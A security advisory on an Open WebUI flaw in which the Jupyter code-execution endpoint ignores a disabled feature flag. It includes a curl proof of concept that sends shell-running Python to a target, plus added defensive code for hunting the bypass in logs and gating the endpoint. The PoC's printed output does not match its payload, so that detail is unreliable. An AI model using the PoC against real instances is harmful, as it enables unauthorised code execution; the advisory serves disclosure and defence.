CVE-2026-45672: Open WebUI: Jupyter code execution works despite `ENABLE_CODE_EXECUTION=false` — feature gate bypassed
Summary
The /api/v1/utils/code/execute endpoint executes arbitrary Python code via Jupyter for any verified user, even when the admin has set ENABLE_CODE_EXECUTION=false. The feature gate is not enforced on the API endpoint — the configuration says "disabled" but code still executes.
Details
The admin configuration correctly shows ENABLE_CODE_EXECUTION: false. However, the code execution endpoint does not check this flag before forwarding Python code to the Jupyter server. Any authenticated user can execute arbitrary code in the Jupyter container.
PoC
Verified against Open WebUI v0.8.11 (latest) Docker on 2026-03-25.
Setup: Jupyter server connected, ENABLE_CODE_EXECUTION=false confirmed in admin config.
```bash
# Step 1: Verify code execution is disabled
curl -s http://target:8080/api/v1/configs/code_execution \
  -H "Authorization: Bearer $TOKEN"
# Returns: {"ENABLE_CODE_EXECUTION": false, ...}

# Step 2: Execute code anyway — gate bypassed
curl -s -X POST http://target:8080/api/v1/utils/code/execute \
  -H "Authorization: Bearer $TOKEN" \
  -H 'Content-Type: application/json' \
  -d '{"code":"import os; print(os.popen(\"id\").read())"}'
```
Verified output:
```
Config: {"ENABLE_CODE_EXECUTION":false,"CODE_EXECUTION_ENGINE":"jupyter",...}
execute_status=200 execute_body={"stdout":"OPEN-WEBUI-SSRF-SECRET","stderr":"","result":""}
```
The PoC read the internal secret service content via Jupyter — despite ENABLE_CODE_EXECUTION=false. The Jupyter container has network access to internal services, making this both a code execution bypass and an SSRF vector.
Impact
Any authenticated user can execute arbitrary Python code in the Jupyter container, even when the admin has explicitly disabled code execution:
- Arbitrary code execution in the Jupyter container (read files, spawn processes)
- Network access to all internal Docker services from the Jupyter container
- Data exfiltration from internal services
- The admin's security configuration (ENABLE_CODE_EXECUTION=false) is silently ineffective
- Users who are told "code execution is disabled" have a false sense of security
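For defenders who ran an affected version with code execution disabled, the practical question is whether anyone used the endpoint anyway. The following is an added example (not part of the advisory or of Open WebUI) that parses reverse-proxy access logs in the common combined format and reports POSTs to /api/v1/utils/code/execute that succeeded while the gate was off. The log lines are constructed for the example; real proxy or Open WebUI log formats may differ, and the user behind a bearer token is not visible in such logs, so a hit identifies a client address and time, not an account.

```python
"""Hunt for calls that slipped past the disabled code-execution gate.

Added example, not Open WebUI code. Parses combined-format access logs and
flags successful requests to the code-execution endpoint made while the
administrator had ENABLE_CODE_EXECUTION turned off.
"""
import re
from collections import Counter
from typing import Dict, Iterable, List, Optional

EXECUTE_PATH = "/api/v1/utils/code/execute"

# Combined log format: ip ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample: one client probes the config endpoint, then calls the
# execute endpoint twice with success; another client is refused with 403.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Mar/2026:10:14:02 +0000] "GET /api/v1/configs/code_execution HTTP/1.1" 200 312 "-" "curl/8.5.0"
10.0.0.5 - - [25/Mar/2026:10:14:09 +0000] "POST /api/v1/utils/code/execute HTTP/1.1" 200 61 "-" "curl/8.5.0"
10.0.0.7 - - [25/Mar/2026:10:20:41 +0000] "POST /api/v1/chats/new HTTP/1.1" 200 1450 "-" "Mozilla/5.0"
10.0.0.9 - - [25/Mar/2026:11:02:17 +0000] "POST /api/v1/utils/code/execute HTTP/1.1" 403 58 "-" "python-requests/2.32"
10.0.0.5 - - [25/Mar/2026:11:05:33 +0000] "POST /api/v1/utils/code/execute HTTP/1.1" 200 77 "-" "curl/8.5.0"
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_execute_calls(lines: Iterable[str], gate_enabled: bool) -> List[Dict[str, object]]:
    """Return every POST to the execute endpoint.

    Each record carries a `bypass` flag: True when the call succeeded (2xx)
    while the gate was off, which is exactly the behaviour the advisory
    describes and which a patched instance would answer with 403.
    """
    hits: List[Dict[str, object]] = []
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST":
            continue
        if rec["path"].split("?", 1)[0] != EXECUTE_PATH:
            continue
        status = int(rec["status"])
        hits.append({
            "ip": rec["ip"],
            "ts": rec["ts"],
            "status": status,
            "bypass": (not gate_enabled) and 200 <= status < 300,
        })
    return hits


def bypasses_per_client(hits: List[Dict[str, object]]) -> Counter:
    """Count bypass candidates by client address for triage."""
    return Counter(str(h["ip"]) for h in hits if h["bypass"])


if __name__ == "__main__":
    found = find_execute_calls(SAMPLE_LOG.splitlines(), gate_enabled=False)
    for h in found:
        print(h)
    print("bypass candidates per client:", dict(bypasses_per_client(found)))
```

Run it against the constructed sample and two of the three execute calls are flagged, both from 10.0.0.5; the 403 from 10.0.0.9 is what a gated handler returns and is not a bypass. On a real instance, feed it the proxy's access log for the period the instance ran a version before 0.8.12 with the flag off.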
Resolution
Fixed in commit 6d736d3c5, first released in v0.8.12. The /api/v1/utils/code/execute handler in backend/open_webui/routers/utils.py now checks request.app.state.config.ENABLE_CODE_EXECUTION before dispatching to the Jupyter engine and returns 403 with FEATURE_DISABLED('Code execution') when the admin has disabled the flag. The retrieval-side code path was gated in the same commit. Users on >= 0.8.12 are not affected.
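The fix is a textbook feature-gate check at the API boundary: consult the flag before the request reaches the engine, not after. The following is an added example, not Open WebUI's code, that models the defect and the fix with plain-Python stand-ins so it runs without FastAPI or Jupyter. Config, Request, FakeJupyterEngine and the FEATURE_DISABLED helper are simplified assumptions standing in for the project's real app state, router and error constants; the one thing it reproduces faithfully is the ordering, gate first, dispatch second.

```python
"""Feature-gate enforcement at the API boundary.

Added example, not Open WebUI code. A handler that forwards straight to the
code-execution engine (the defect) sits beside one that consults
ENABLE_CODE_EXECUTION first and answers 403 (the fix), plus a regression
check that proves the engine is never reached while the feature is off.
"""
from dataclasses import dataclass, field
from http import HTTPStatus
from typing import Any, Callable, Dict, List, Optional, Tuple

Response = Tuple[HTTPStatus, Dict[str, Any]]


def FEATURE_DISABLED(feature: str) -> str:
    """Stand-in for the error message named in the advisory (assumption)."""
    return f"{feature} is disabled by the administrator."


@dataclass
class Config:
    """Minimal stand-in for request.app.state.config (assumption)."""
    ENABLE_CODE_EXECUTION: bool = False
    CODE_EXECUTION_ENGINE: str = "jupyter"


@dataclass
class Request:
    """Minimal stand-in for an authenticated request carrying a JSON body."""
    config: Config
    body: Dict[str, Any] = field(default_factory=dict)


class FakeJupyterEngine:
    """Records what it was asked to run instead of executing anything."""

    def __init__(self) -> None:
        self.executed: List[str] = []

    def execute(self, code: str) -> Dict[str, str]:
        self.executed.append(code)
        return {"stdout": f"<would run {len(code)} chars>", "stderr": "", "result": ""}


def execute_code_unchecked(request: Request, engine: FakeJupyterEngine) -> Response:
    """Vulnerable shape: dispatches to the engine without consulting the gate."""
    return HTTPStatus.OK, engine.execute(request.body["code"])


def require_feature(flag: str, label: str) -> Callable[[Request], Optional[Response]]:
    """Build a guard that yields a 403 response whenever `flag` is off in config."""

    def guard(request: Request) -> Optional[Response]:
        if not getattr(request.config, flag, False):
            return HTTPStatus.FORBIDDEN, {"detail": FEATURE_DISABLED(label)}
        return None

    return guard


code_execution_gate = require_feature("ENABLE_CODE_EXECUTION", "Code execution")


def execute_code_gated(request: Request, engine: FakeJupyterEngine) -> Response:
    """Fixed shape: the gate runs before any code can reach the engine."""
    denied = code_execution_gate(request)
    if denied is not None:
        return denied
    return HTTPStatus.OK, engine.execute(request.body["code"])


def gate_is_enforced(handler: Callable[[Request, FakeJupyterEngine], Response]) -> bool:
    """Regression check: with the feature off, the handler must refuse with 403
    and the engine must record no execution at all."""
    engine = FakeJupyterEngine()
    req = Request(Config(ENABLE_CODE_EXECUTION=False), {"code": "print('probe')"})
    status, _ = handler(req, engine)
    return status == HTTPStatus.FORBIDDEN and engine.executed == []


if __name__ == "__main__":
    for name, handler in (("unchecked", execute_code_unchecked), ("gated", execute_code_gated)):
        print(f"{name}: gate enforced = {gate_is_enforced(handler)}")
```

The `gate_is_enforced` check is the kind of test that would have caught the original defect: it asserts on the engine's side effects, not just on the HTTP status, so a handler that returns an error only after dispatching still fails it. Keeping the guard as a reusable `require_feature` also lets the retrieval-side path mentioned in the advisory share the same check rather than re-implementing it.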
Other sources
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.12, the /api/v1/utils/code/execute endpoint executes arbitrary Python code via Jupyter for any verified user, even when the admin has set ENABLE_CODE_EXECUTION=false. The feature gate is not enforced on the API endpoint — the configuration says "disabled" but code still executes. This vulnerability is fixed in 0.8.12.
— MITRE
Frequently Asked Questions
What is the severity of CVE-2026-45672?
CVE-2026-45672 is considered a critical vulnerability due to improper restriction on code execution.
How do I fix CVE-2026-45672?
To fix CVE-2026-45672, upgrade open-webui to version 0.8.12 or later.
What are the affected versions related to CVE-2026-45672?
CVE-2026-45672 affects open-webui versions prior to 0.8.12, specifically including all versions up to 0.8.11.
What impact does CVE-2026-45672 have on users?
CVE-2026-45672 allows authenticated users to execute arbitrary Python code, potentially compromising the system.
Is there a workaround for CVE-2026-45672?
There are no recommended workarounds for CVE-2026-45672; upgrading to the fixed version is the only solution.